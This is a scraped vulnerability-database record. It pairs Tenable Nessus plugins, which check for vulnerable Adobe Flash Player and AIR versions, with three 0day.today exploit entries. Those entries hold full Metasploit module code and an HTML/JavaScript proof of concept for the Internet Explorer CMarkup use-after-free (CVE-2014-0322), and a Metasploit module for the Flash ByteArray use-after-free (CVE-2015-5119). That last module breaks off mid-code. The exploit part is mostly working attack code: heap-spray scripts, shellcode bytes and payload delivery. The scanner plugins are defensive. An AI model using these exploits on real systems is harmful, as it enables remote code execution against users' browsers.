"CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84644", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84644);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16) (Mac OS X)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 18.0.0.194. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"18.0.0.194\";\n fix = \"18.0.0.203\";\n}\nelse\n{\n cutoff_version = \"13.0.0.296\";\n fix = \"13.0.0.302\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T22:27:17", "description": "According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)", "edition": 31, "published": "2015-07-09T00:00:00", "title": "Adobe AIR <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84641);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n\n script_name(english:\"Adobe AIR <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 18.0.0.180 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '18.0.0.144';\nfix = '18.0.0.180';\nfix_ui = '18.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-08T14:23:17", "description": "This Metasploit module exploits an use after free condition on Internet Explorer as used in the wild on the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to bypass ASLR and finally DEP.", "edition": 2, "published": "2014-04-16T00:00:00", "type": "zdt", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-16T00:00:00", "id": "1337DAY-ID-22151", "href": "https://0day.today/exploit/description/22151", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Internet Explorer as used in the wild\r\n on the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\r\n bypass ASLR and finally DEP.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and Exploit in the wild\r\n 'Jean-Jamil Khalife', # Exploit\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-0322' ],\r\n [ 'MSB', 'MS14-012' ],\r\n [ 'BID', '65551' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'],\r\n [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 960,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN,\r\n :ua_name => Msf::HttpClients::IE,\r\n :ua_ver => '10.0',\r\n :mshtml_build => lambda { |ver| ver.to_i < 16843 },\r\n :flash => /^12\\./\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows 7 SP1 / IE 10 / FP 12', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Feb 13 2014\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def stack_adjust\r\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n \r\n adjust\r\n end\r\n \r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" )\r\n fd = ::File.open( path, \"rb\" )\r\n swf = fd.read(fd.stat.size)\r\n fd.close\r\n return swf\r\n end\r\n \r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n print_status(\"Request: #{request.uri}\")\r\n \r\n if request.uri =~ /\\.swf$/\r\n print_status(\"Sending SWF...\")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n super\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n flash_payload = \"\"\r\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\r\n flash_payload << \"0x#{i.to_s(16)},\"\r\n end\r\n flash_payload.gsub!(/,$/, \"\")\r\n \r\n html_template = %Q|\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n \r\n <script>\r\n \r\n var g_arr = [];\r\n var arrLen = 0x250;\r\n \r\n function dword2data(dword)\r\n {\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n \r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n }\r\n \r\n function eXpl()\r\n {\r\n var a=0;\r\n \r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n \r\n var b = dword2data(0x19fffff3);\r\n \r\n while (b.length < 0x360) {\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n \r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n try{\r\n this.outerHTML=this.outerHTML\r\n } catch(e){\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n }\r\n \r\n function trigger()\r\n {\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n }\r\n \r\n </script>\r\n <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\">\r\n </embed>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html_template, binding()\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22151"}, {"lastseen": "2018-01-04T13:03:28", "edition": 2, "description": "Exploit for windows platform in category local exploits", "published": "2014-04-15T00:00:00", "type": "zdt", "title": "Internet Explorer 10 & Adobe Flash Player (12.0.0.70, 12.0.0.77) - CMarkup Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-15T00:00:00", "id": "1337DAY-ID-22145", "href": "https://0day.today/exploit/description/22145", "sourceData": "<!--\r\n MS14-012 Internet Explorer CMarkup Use-After-Free\r\n Vendor Homepage: http://www.microsoft.com\r\n Version: IE 10\r\n Date: 2014-03-31\r\n Exploit Author: Jean-Jamil Khalife\r\n Tested on: Windows 7 SP1 x64 (fr, en)\r\n Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)\r\n Home: http://www.hdwsec.fr\r\n Blog : http://www.hdwsec.fr/blog/\r\n MS14-012 / CVE-2014-0322\r\n \r\n Generation:\r\n c:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf\r\n \r\n E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as\r\n \r\n-->\r\n \r\n<html>\r\n<head>\r\n</head>\r\n<body>\r\n \r\n<script>\r\n \r\nvar g_arr = [];\r\nvar arrLen = 0x250;\r\n \r\nfunction dword2data(dword)\r\n{\r\n var d = Number(dword).toString(16);\r\n while (d.length < 8)\r\n d = '0' + d;\r\n \r\n return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\r\n}\r\n \r\nfunction eXpl()\r\n{\r\n var a=0;\r\n \r\n for (a=0; a < arrLen; a++) {\r\n g_arr[a] = document.createElement('div');\r\n }\r\n \r\n // Build a new object\r\n var b = dword2data(0x19fffff3);\r\n while (b.length < 0x360)\r\n {\r\n // mov eax,dword ptr [esi+98h]\r\n // ...\r\n // mov eax,dword ptr [eax+8]\r\n // and dword ptr [eax+2F0h],0FFFFFFBFh\r\n if (b.length == (0x98 / 2))\r\n {\r\n b += dword2data(0x1a000010);\r\n }\r\n // mov ecx,dword ptr [edx+94h]\r\n // mov eax,dword ptr [ecx+0Ch]\r\n else if (b.length == (0x94 / 2))\r\n {\r\n b += dword2data(0x1a111111);\r\n }\r\n // mov eax,dword ptr [edx+15Ch]\r\n // mov ecx,dword ptr [eax+edx*8]\r\n else if (b.length == (0x15c / 2))\r\n {\r\n b += dword2data(0x42424242);\r\n }\r\n else\r\n {\r\n b += dword2data(0x19fffff3);\r\n }\r\n }\r\n \r\n var d = b.substring(0, ( 0x340 - 2 )/2);\r\n \r\n // trigger\r\n try{\r\n this.outerHTML=this.outerHTML\r\n }\r\n catch(e){\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n // Replace freed object\r\n for (a=0; a < arrLen; a++)\r\n {\r\n g_arr[a].title = d.substring(0, d.length);\r\n }\r\n}\r\n \r\n// Trigger the vulnerability\r\nfunction trigger()\r\n{\r\n var a = document.getElementsByTagName(\"script\");\r\n var b = a[0];\r\n b.onpropertychange = eXpl;\r\n var c = document.createElement('SELECT');\r\n c = b.appendChild(c);\r\n}\r\n \r\n \r\n \r\n</script>\r\n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22145"}, {"lastseen": "2018-01-05T03:19:42", "edition": 2, "description": "This Metasploit module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This Metasploit module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.", "published": "2015-07-08T00:00:00", "type": "zdt", "title": "Adobe Flash Player ByteArray Use After Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "1337DAY-ID-23842", "href": "https://0day.today/exploit/description/23842", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\r\n discovered by Hacking Team and made public on its July 2015 data leak, was\r\n described as an Use After Free while handling ByteArray objects. This module has\r\n been tested successfully on:\r\n\r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\r\n Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Someone from HackingTeam\r\n 'juan vazquez', # msf module\r\n 'sinn3r' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-5119'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\r\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81 ||\r\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\r\n os =~ OperatingSystems::Match::WINDOWS_XP\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n # Note: Chrome might be vague about the version.\r\n # Instead of 18.0.0.203, it just says 18.0\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= 